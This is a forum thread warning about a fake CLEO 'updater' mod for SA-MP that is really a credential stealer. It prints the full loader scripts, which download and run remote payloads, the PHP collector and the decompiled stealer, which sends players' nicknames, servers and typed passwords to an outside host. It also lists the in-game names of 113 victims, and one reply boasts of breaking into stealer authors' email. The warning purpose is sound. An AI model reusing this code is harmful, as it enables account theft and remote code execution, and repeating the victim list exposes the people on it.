Intriguing scam (check if your data was stolen)

monday

[video=youtube]https://www.youtube.com/watch?v=dNTbpmnWZU0[/video]


Code:
0000:
 
// Entry point of the first (earlier) variant of the "updater" script.
// It is a loader: once SA-MP is up it fetches a remote manifest and runs whatever
// scripts that manifest points to (see :check_updates), then idles forever.
const 
    SCRIPT_VERSION = 1
 
    // Local files the manifest and the changelog are downloaded to
    // (relative paths; presumably resolved against the game directory).
    UPDATEINFO_FILE = "cleo_name_update.txt"
    CHANGELOG_FILE = "cleo_name_changelog.txt"
end
 
// Poll every 3 s until the SA-MP client is available; nothing happens in single player.
repeat
    wait 3000
until 0AFA:  is_samp_available
 
wait 0
 
// One-shot update check: compares the remote version with SCRIPT_VERSION and pulls
// the listed files. Nothing downstream verifies what is fetched (no hash, no signature),
// so whoever controls the manifest host decides what runs inside the game process.
0AB1: call_scm_func @check_updates 1 current_version SCRIPT_VERSION
 
// Park the thread. :show_changelog exists below but is never called from this listing.
while true
    wait 0
end
 
:download_check_status 
// Blocks until the CLEO download handle in 0@ leaves the "still running" state.
// Input : 0@ = handle returned by 0C65 download_url.
// Output: one return value, the final 0C66 state. The loop assumes the state stays -1
//         while the transfer is in progress; the callers only proceed when it ends as 0.
1@ = -1
while 1@ == -1 
    wait 0
    0C66: 1@ = get_download 0@ state 
end
0AB2: ret 1 1@ // final state goes to the caller's status_to variable
 
:url_fileupdateinfo // address of the remote update manifest
// Raw bytes of the manifest URL (an INI file read by :check_updates), NUL-terminated.
// The two leading slashes are separate literals, seemingly so the text never contains
// the "//" sequence, which the compiler would otherwise treat as a comment start.
// Plain HTTP: the manifest can also be replaced by anyone on the network path.
hex
    "http:" "/" "/" "rvankarus.esy.es/cleo/update.txt" 00
end
 
:check_updates
// Downloads the remote manifest and, when it advertises a newer version, fetches and
// starts every file the manifest lists. Called once from the main thread.
// Input : 0@ = current_version (SCRIPT_VERSION of the running script).
// Output: none (ret 0).
// The version number, every URL and every payload come from an unauthenticated
// plain-HTTP file; nothing is validated before the payloads are written into the
// CLEO folder and executed.
0AC6: 1@ = label @url_fileupdateinfo offset // pointer to the NUL-terminated manifest URL
0C65: 1@ = download_url 1@ to_file UPDATEINFO_FILE // start the (asynchronous) manifest download
0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@
0C7D: release_download 1@ // free the handle; 2@ now holds the final download state
 
if 2@ <> 0 // manifest download did not end with state 0
then
    wait 0 // failure branch is a no-op
else // manifest fetched
    wait 0
 
    if 0AAB: file_exists UPDATEINFO_FILE // guard against a "successful" download that wrote nothing
    then
        0AF0: 3@ = get_int_from_ini_file UPDATEINFO_FILE section "UPDATE" key "version" // remote version, attacker-controlled
        if 001D: 3@ > 0@ // remote version is newer than the running one
        then
            wait 0
 
            // 260-byte scratch buffer reused for every URL read from the manifest
            // (260 = Windows MAX_PATH, presumably; 0AF4 appears to write through the pointer,
            // which is why the buffer is zeroed before each read).
            0AC8: 4@ = allocate_memory_size 260 // 
            0C11: memset destination 4@ value 0 size 260 // 
 
            // 1) changelog: downloaded only; :show_changelog is never called in this listing.
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "changelog_url" // 
            0C65: 1@ = download_url 4@ to_file CHANGELOG_FILE // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // 
            0C7D: release_download 1@ //
 
            if 2@ == 0
            then
                wait 0 // status is read but never acted on
 
            end
 
            // ------- 2) "script_url": written into the CLEO folder and started at once.
            // create_custom_thread runs before the status check, and that check is a no-op in
            // both branches, so whatever ended up on disk is executed regardless of the result.
            // The post identifies FileSystem.cs as the credential stealer decompiled further down.
            0C11: memset destination 4@ value 0 size 260 // 
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script_url" //
            0C65: 1@ = download_url 4@ to_file "cleo/FileSystem.cs" // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //
            0A92: create_custom_thread "FileSystem.cs"

            if 2@ == 0
            then
            wait 0
            else
                wait 0
            end
            
            // ------- 3) "script1": same pattern, second executed payload (animbot4.cs).
            0C11: memset destination 4@ value 0 size 260 // 
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script1" //
            0C65: 1@ = download_url 4@ to_file "cleo/animbot4.cs" // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //
            0A92: create_custom_thread "animbot4.cs"

            if 2@ == 0
            then
            wait 0
            else
                wait 0
            end
            
            // ------- 4) "data1": arbitrary file dropped under data\Decision\chris\ (not started here;
            // its contents are not visible in this thread).
            0C11: memset destination 4@ value 0 size 260 // 
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "data1" //
            0C65: 1@ = download_url 4@ to_file "data\Decision\chris\data1.txt" // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //

            if 2@ == 0
            then
            wait 0
            else
                wait 0
            end
            
            // ------- 5) "data2": same as data1.
            0C11: memset destination 4@ value 0 size 260 // 
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "data2" //
            0C65: 1@ = download_url 4@ to_file "data\Decision\chris\data2.txt" // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //

            if 2@ == 0
            then
            wait 0
            else
                wait 0
            end
 
            0AC9: free_allocated_memory 4@ // release the shared URL buffer
        end
    end
end
0AB2: ret 0
 
:show_changelog // reads CHANGELOG_FILE into one buffer and shows it in a SA-MP dialog
// No input, returns nothing (ret 0). Not called from anywhere in this listing.
if 0A9A: 0@ = openfile CHANGELOG_FILE mode "rt" // text mode; silently skips everything if the file is missing
then
    0AC8: 1@ = allocate_memory_size 96 // one-line buffer: reads of at most 95 chars plus NUL
    0C11: memset destination 1@ value 0 size 96
 
    0A9C: 2@ = file 0@ size // 
    2@++ // room for the terminating NUL
 
    0AC8: 4@ = allocate_memory_size 2@ // whole-file buffer; the concatenated text presumably cannot exceed the file size
    0C11: memset destination 4@ value 0 size 2@
    repeat     
        0AD7: read_string_from_file 0@ to 1@ size 95
        0C17: 3@ = strlen 1@
        if 3@ > 0
        then
            0C15: strcat destination 4@ source 1@ // append the line to the whole-file buffer
        end
    until 0AD6: end_of_file 0@ reached
 
    // Caption carries the author's name; button_2 is empty, so only "Closed" is offered.
    0B3B: samp show_dialog id 335 caption "{FFFFFF}Daniel Nguyen" text 4@ button_1 "Closed" button_2 "" style 0 // 
 
    0AC9: free_allocated_memory 4@ // 
    
    0AC9: free_allocated_memory 1@ // 
    0A9B: closefile 0@ // 
end
0AB2: ret 0


Code:
0000:

// Entry point of the second (later) variant. Same loader as above with a different
// manifest host and all state files moved under data\Decision\chris\.
const 
    SCRIPT_VERSION = 1

    UPDATEINFO_FILE = "data\Decision\chris\cleo_name_update.txt"
    CHANGELOG_FILE = "data\Decision\chris\cleo_name_changelog.txt"
    // The six paths below are declared but never referenced anywhere in this listing.
    DELTA_1 = "data\Decision\chris\delta.txt"
    NAVY_1 = "data\Decision\chris\navy.txt"
    HUMAN_1 = "data\Decision\chris\human.txt"
    AIR_1 = "data\Decision\chris\air.txt"
    COMMAN_1 = "data\Decision\chris\comman.txt" 
    SECU_1 = "data\Decision\chris\secu.txt" 
end

// Wait (5 s polls) until the local player has spawned, i.e. is already on a server.
repeat
    wait 5000
    until 0B61:  samp is_local_player_spawned



// Posts an empty chat line; has no visible purpose beyond possibly looking like activity.
0AF8: samp add_message_to_chat "" color -1

// One-shot update check; nothing downloaded by it is verified (see :check_updates).
0AB1: call_scm_func @check_updates 1 current_version SCRIPT_VERSION

// Park the thread; :show_changelog is never called from this listing either.
while true
    wait 0
end

:download_check_status 
// call @download_check_status 1 download_n 0@
// Blocks until the download handle in 0@ leaves the "still running" state (assumed to be -1)
// and returns the final 0C66 state as the single return value.
// NOTE(review): the lone "/" at the end of the get_download line looks like a truncated
// "//" comment marker from the paste; it is left as-is here.
1@ = -1
while 1@ == -1 
    wait 0
    0C66: 1@ = get_download 0@ state /
end
0AB2: ret 1 1@ 

:url_fileupdateinfo 
// NUL-terminated manifest URL for this variant; different host than the first variant
// (rvankarus1.pe.hu instead of rvankarus.esy.es), still plain HTTP. The leading slashes
// are separate literals, seemingly to keep "//" out of the quoted text.
hex
    "http:" "/" "/" "rvankarus1.pe.hu/cleo/update.txt" 00
end

:check_updates
// call @check_updates 1 current_version 0@
// Second-variant loader: fetches the manifest, and if its "version" is newer than 0@,
// downloads up to six files and starts four of them as CLEO threads. As in the first
// variant nothing is authenticated; the only "checks" are no-op branches.
// Marker.Disable(7@) is used as a filler statement everywhere the first variant had
// "wait 0": 7@ is never assigned in this function, so it disables whatever marker handle
// a fresh local holds (presumably 0).
0AC6: 1@ = label @url_fileupdateinfo offset // pointer to the manifest URL bytes
0C65: 1@ = download_url 1@ to_file UPDATEINFO_FILE // start the manifest download
0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@
0C7D: release_download 1@ // free the handle; 2@ holds the final state

if 2@ <> 0 // manifest download did not end with state 0
then
     Marker.Disable(7@)
else // manifest fetched
     Marker.Disable(7@)

    if 0AAB: file_exists UPDATEINFO_FILE // guard against an empty download
    then
        0AF0: 3@ = get_int_from_ini_file UPDATEINFO_FILE section "UPDATE" key "version" // remote version, attacker-controlled
        if 001D: 3@ > 0@ // remote version newer than the running one
        then
             Marker.Disable(7@)

            // 260-byte scratch buffer reused for each URL read from the manifest (260 = MAX_PATH, presumably)
            0AC8: 4@ = allocate_memory_size 260 // 
            0C11: memset destination 4@ value 0 size 260 // 

            // 1) changelog: downloaded and then ignored (no status check, :show_changelog never called)
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "changelog_url" // 
            0C65: 1@ = download_url 4@ to_file CHANGELOG_FILE // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // 
            0C7D: release_download 1@ //


            // ------- 2) "script2": dropped as anticrash-1.cs and started immediately; the thread
            // starts before the status check, which does the same thing on both branches.
            0C11: memset destination 4@ value 0 size 260 //
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script2" //
            0C65: 1@ = download_url 4@ to_file "cleo/anticrash-1.cs" // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //
            0A92: create_custom_thread "anticrash-1.cs"


            if 2@ == 0
            then
                Marker.Disable(7@)
            else
                Marker.Disable(7@)
            end
            
             // ------- 3) "script1": dropped as FileSystemOperations.cs but NOT started here
             // (CLEO presumably loads it from the folder on the next game start).
            0C11: memset destination 4@ value 0 size 260 //
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script1" //
            0C65: 1@ = download_url 4@ to_file "cleo/FileSystemOperations.cs" // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //
            
            if 2@ == 0
            then
                Marker.Disable(7@)
            else
                Marker.Disable(7@)
            end
            
             // ------- 4) "script3": written as Systemcode.cs, started as "systemcode.cs"
             // (case differs; harmless on a case-insensitive file system).
            0C11: memset destination 4@ value 0 size 260 //
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script3" //
            0C65: 1@ = download_url 4@ to_file "cleo/Systemcode.cs" // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //
            0A92: create_custom_thread "systemcode.cs"
            
            if 2@ == 0
            then
                Marker.Disable(7@)
            else
                Marker.Disable(7@)
            end
            
             // ------- 5) "script4": backupp1.cs, downloaded and started.
            0C11: memset destination 4@ value 0 size 260 //
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script4" //
            0C65: 1@ = download_url 4@ to_file "cleo/backupp1.cs" // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //
            0A92: create_custom_thread "backupp1.cs"
            
            
            if 2@ == 0
            then
                Marker.Disable(7@)
            else
                Marker.Disable(7@)
            end
            
            
             // ------- 6) "script5": backupp2.cs, downloaded and started; no status check at all.
            0C11: memset destination 4@ value 0 size 260 //
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script5" //
            0C65: 1@ = download_url 4@ to_file "cleo/backupp2.cs" // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //
            0A92: create_custom_thread "backupp2.cs"
            
            
            
            
            


            0AC9: free_allocated_memory 4@ // release the shared URL buffer
        end
    end
end
0AB2: ret 0

:show_changelog // reads CHANGELOG_FILE into one buffer and shows it as a SA-MP dialog
// No input, returns nothing (ret 0). Not called from anywhere in this listing.
if 0A9A: 0@ = openfile CHANGELOG_FILE mode "rt" // text mode; does nothing if the file is missing
then
    0AC8: 1@ = allocate_memory_size 96 // one-line buffer: at most 95 chars plus NUL
    0C11: memset destination 1@ value 0 size 96

    0A9C: 2@ = file 0@ size // 
    2@++ // room for the terminating NUL

    0AC8: 4@ = allocate_memory_size 2@ // whole-file buffer; concatenated text presumably cannot exceed the file size
    0C11: memset destination 4@ value 0 size 2@
    repeat     
        0AD7: read_string_from_file 0@ to 1@ size 95
        0C17: 3@ = strlen 1@
        if 3@ > 0
        then
            0C15: strcat destination 4@ source 1@ // append the line to the whole-file buffer
        end
    until 0AD6: end_of_file 0@ reached

    // Caption is styled to look like a server-side "San Andreas Armed Service" notice; only one button.
    0B3B: samp show_dialog id 335 caption "{66CC00}San Andreas Armed Service" text 4@ button_1 "10-4" button_2 "" style 0 // 

    0AC9: free_allocated_memory 4@ // 

    0AC9: free_allocated_memory 1@ //
    0A9B: closefile 0@ // 
end
0AB2: ret 0

Code:
<?php  
  // Server-side collector behind the stealer's add.php: every request appends one HTML line
  // to Readme.HTML. The field names mirror the query string the client thread builds:
  // nick, ip (host:port), serv (server name), dialog (dialog id), input (text typed into the
  // dialog edit box - what the thread identifies as the password), mn (money).
  // No authentication, validation or escaping is applied to any parameter before it is written.
  $f = fopen("Readme.HTML", "a");  
  $s = "<u>Login:</u><strong> " . $_GET['nick'] . " |...|</strong> " . " <u>Ip:</u> " . $_GET['ip'] . " <strong>|...|</strong> " . " <u>Server:</u><em> " . $_GET['serv'] . " </em><strong>|...|</strong> " . " <u>Dialog:</u> " . $_GET['dialog'] . " <strong>|...|</strong> " . " <u>Text:</u><strong> " . $_GET['input'] . " |...|</strong> " . " <u>Money:</u> " . $_GET['mn'] . "<br />";  
  fwrite($f, $s);  
  fclose($f);  
  ?>

//--------------------------------------------------------------------------------------------------------------------------------------------------------
}
{$CLEO}
// Decompiled body of the dropped stealer (the file the loader above writes as FileSystem.cs,
// according to the post). Opcodes appear numerically; an 8xxx opcode is the negated form of 0xxx.
// Flow: wait for SA-MP -> wait for any dialog -> keep copying the edit-box text until the
// dialog closes -> collect nickname, money and server -> send everything in one HTTP GET.
thread 'NoName'
While 8afa: // while NOT is_samp_available
wait 100
end   
While 8B4C: -1 // while no dialog is active (is_dialog_active, -1 = any id, presumably)
wait 100
end
While 0B4C: -1 // while a dialog is showing
wait 0
0B4E: samp 0@ = get_current_dialog_id
0AC8: 6@ = 64 // 0AC8 = allocate_memory_size: 64-byte buffer for the edit-box text
repeat
wait 0
0B4A: samp 6@ = get_current_dialog_editbox_text // re-copied every frame, so 6@ ends up holding what was typed when the dialog went away
until 8B4C: -1  // until the dialog is gone (submitted or cancelled)
0AC8: 1@ = 24 // nickname buffer
0B2B: 2@ = $PLAYER_ACTOR // presumably the local player's SA-MP id from the actor handle
0B36: samp 1@ = get_player_nickname 2@
wait 500
010B: 2@ = player $PLAYER_CHAR money // 2@ is reused: from here on it is the money value
0AC8: 3@ = 15 // server address buffer
0B39: samp get_current_server_address 3@ port 4@
0AC8: 5@ = 86 // server name buffer
0B3A: samp 5@ = get_current_server_name
0C17: 10@ = strlen 6@
if 10@ > 1 // report only when at least two characters were typed into the dialog
    then  
    0AC8: 8@ = 445 // buffer for the exfiltration URL
    // Every '/' is a %c filled with 47 so the quoted string never contains "//".
    // The original (cp1251, shown mojibaked) author comment says, translated: "in SB you cannot
    // write a slash inside quotes, so where a slash belongs there is %c, a character passed in
    // the params; each %c gets 47, the code of the slash. By default the address is
    // http://stilloger.ph/stealer/add.php?[data follows], written as
    // http:%c%cstilloger.ph%cstealer%cadd.php?[data follows]". That note suggests this is a
    // re-hosted copy of an existing stealer template, re-pointed at rvankarus.esy.es.
    // Parameter order: nick=1@ ip=3@:4@ serv=5@ dialog=0@ input=6@ mn=2@ (matches add.php above).
    0AD3: 8@ = format "http:%c%crvankarus.esy.es%ccleo%cadd.php?nick=%s&ip=%s:%d&serv=%s&dialog=%d&input=%s&mn=%d" params 47 47 47 47 1@ 3@ 4@ 5@ 0@ 6@ 2@ // build the GET URL
    // The "download" only exists to issue the request: URLDownloadToFileA fetches the URL and
    // stores the response under szFileName. Whether that API expands %TEMP% is doubtful, so the
    // artifact may land in a literal "%TEMP%" folder relative to the game; either way the
    // request is sent. The urlmon.dll/URLDownloadToFileA strings and the hard-coded host are
    // easy things to grep for when vetting .cs files.
    0AA2: 9@ = load_library "urlmon.dll" // IF and SET
    0AA4: 7@ = get_proc_address "URLDownloadToFileA" library 9@ // IF and SET     
    0AA5: call 7@ num_params 5 pop 0 params lpfnCB 0 dwReserved 0 szFileName "%TEMP%\2352sfe.tmp" szUrl 8@ caller 0  
    0AA3: 9@  // free_library
    0AC9: 8@ // free the URL buffer
    end
0AC9: 1@ // free the per-dialog buffers
0AC9: 3@
0AC9: 5@
0AC9: 6@
wait 500 
end     
// No dialog is showing any more: zero the locals and end the thread (the repeated
// end_custom_thread lines are presumably decompiler noise).
0@ = 0
1@ = 0
2@ = 0
3@ = 0
4@ = 0
5@ = 0
6@ = 0
7@ = 0
8@ = 0
9@ = 0 
10@ = 0
30@ = 0
31@ = 0
wait 1000
0A93: end_custom_thread
0A93: end_custom_thread
0A93: end_custom_thread
0A93: end_custom_thread


some nice names for malware:
-FileSystem.cs (downloaded from http://rvankarus.esy.es/cleo/steal.cs xD)
-backup2.cs
-anticrash-1
-systemcode.cs
-backupp1.cs
-backupp2.cs


113 players' data stolen within 3 days


Admin_Rgame
Anti_Hack
Bari_Whatameal
Be_Heo
Bem_Mes
BesT_Jay
Best_Jay
Black_Sat
Black_Tammmmm
Black_Tamq
Black_Tanker
Black_hero
Black_herobe
Carry_GumBall
Cet_Nhox
Chinh_Ho
CoCo_Chopper
Con_Bord
Cotex_Huong
DCS_Thuan
Daniel_Elxotia
David_BonNhox
David_Mimi
Demon_Loko
Denis_Kolavov
DepZaiii
Desi_Hem
Destroyer_Nhan
Dinh.Hoang_Tan
Doug_Las
Douglas_Spatacus
Douglas_Stacus
Fed_Ded
Fin_Balor
HOANG_LXAG
HackOf_War
HellenS_SaraS
HoPham_TuanKiet
Hoan_Star
Hoang_guyto
Hoangg_Longg
Hoangg_Tann
Huan_Slatus
Huy_Per
Jay_Jay
Jean_my
Karry_GumBall
Kea_Rez
Kenji_William
Kich_Hoat
Killer_Death
Killer_Deathh
Killer_death
Killerr_Death
Killerr_Deathh
Martin_Geo
Master_Gaistr
Master_Sver
Med_Die
Men_Len
Minh_Hieu
NguyenVan_Hoang
Nhan_KDE
Nhan_KDEE
Niko_graviss
Oni_Baka
PhamTruong_Quoc
Phong_Le
Phuc.Nguyen
Phuc_Nguyen
Phuc_Nguyena
Pick_Daxuo
Play_Boyzzzz
Pro_Game
PurceIl_Bellamy
Purcell_Bellamy
Purcell_Bellamys
Quang_Thai
Rens_Shin
Roy_Race
San_Haden
San_haden
Skin_Sasuke
Skin_sasuke
Tan_Dubai
Tan_Nguyen
Tend_DSd
Tes_Ts
Thanh_Thuan
Thien_Tan
Thinh_Dizz
Tim_Lim
Timds_Ties
Trum_BizSung
Trum_Hanh
Trum_TeamNgua
Trum_TeamNhua
Viperr
Viperrr
Viperrrr
Vua_Zeuss
Willam_Teds
Willam_pro
You_Mother
[VN]_HuyPArker
[VN]_HuyParker
hidan_shine
killer_Death
kingbesst
kingbest
skin_sasuke
 

monday

Essentially it's a credential stealer; it uploads something like this:
Name: Douglas_Spatacus | Sever: 163.44.206.243:7777 | Server: [VcG] Vietnamese Community GTA | Dialog: 50 | Password: | | Money: 142907377 |IP: 00.000.000.00 | Time: [2017/07/02 - 18:30:06]

But it has auto-updates and created cleo files that are no longer hosted on his server, so it's difficult to say what exactly it did or what exactly it will do in the future; it could do anything.
 

0BE4

nice warning, tho i think admins here check if each .cs is clean... right admins (Not sure i just think i heard that before from springfield(aka if you are reading this springfield and you don't remember shit you can just pm me and i'll remove this part) but MAYBE i am just saying MAYBE they just throw shit)? but there are many people here who download anything from anywhere without decompiling it...

Psst. LOL this comment doesn't even give a single useful statement it's just a pile of maybes xD

If you are too lazy to read: Good thing there is actually a living human who doesn't get too lazy to warn others...

useful tips:
there is a good anti stealer(Never actually made a stealer to test it)...
.exe's are mostly very unsafe you can absolutely hide ANYTHING even a rat if you want...
Never download anything that says: write your name and delete it. Why? Because it's simply a keylogger: since they can't log your name, they ask you to type it so that they get it logged.
Never download anything that says "exploit" in it which asks you for a specific server and a specific amount of money. Why, you may ask? NO exploit in this world asks for a specific amount of money unless the value is VERY specific...
try virustotal.com results aren't too accurate (I made an entire goddamn rat that doesn't even get detected)
Decompile every cleo you have and every cleo you will download... if it's encrypted better never touch it
if you don't know how to understand code spam springfield (Just kidding)
it's just about simple instructions you can read cleo viruses and shit never looks like a simple set car position cleo

Sorry, there is no lazy version...
 

Zin

Actually there is a lazy version.

http://ugbase.eu/Thread-IMPORTANT-Informations-regarding-CLEO-Keyloggers?highlight=%28IMPORTANT%29+Informations+regarding+CLEO+Keyloggers
 

monday

The video and the mod have been shared and probably made by "Daniel Nguyen", who deleted it, created a new account on UGBASE "ParkCant" and UGBASE discord "Tose_Khovor", trying to convince me to delete the source code because:

6HdMweA.png


EI9Lbj0.png

He wrote to himself using alternative fb account, made 2 accounts (ugbase + discord) to pretend he's worrying about people making malware, potentially made few "shit-posts" just to increase his credibility (and move this thread away from the latest topics), said that someone in his group shared it and said it was "anti-crash", he posted 2 images of it, 1st showing the post, 2nd showing members of that group (he probably doesn't know that the first displayed person of the group is the owner of the account xD)

[img=200x200]http://cdn-static.denofgeek.com/sites/denofgeek/files/styles/main_wide/public/2017/01/sherlock_holmes.jpg?itok=rWgQ454n[/img]
 

monday

Edit: Now he made "KerbalSpace" account and spams the same way lol
 

0BE4

xD ... i was once sent to one of these but it was .exe, it used to simply get the data and send it via email to the noob... So i disassembled it AND just by using the very basics i was able to access his email .... xD Yeah trust me it's VERY easy to get it if the guy is too noob (Don't worry, they mostly are)... maybe i'll do a thread on how to get emails and passwords from noobs sending stealers and shit... Now i enjoy these "Stealers" a bit too much xD
 

TeRmminaTo[R]

can someone tell me how this work i dont understand :/ ( can someone give me a link to download it full xD)
 

WaTTi

TeRmminaTo[R] said:
can someone tell me how this work i dont understand :/ ( can someone give me a link to download it full xD)

WHY YOU WANT DOWNLOAD AND USE A FUCKING DATA STEALER. :-/
 

TeRmminaTo[R]

WaTTi said:
TeRmminaTo[R] said:
can someone tell me how this work i dont understand :/ ( can someone give me a link to download it full xD)

WHY YOU WANT DOWNLOAD AND USE A FUCKING DATA STEALER. :-/

I just need it  :areyoukiddingme:
 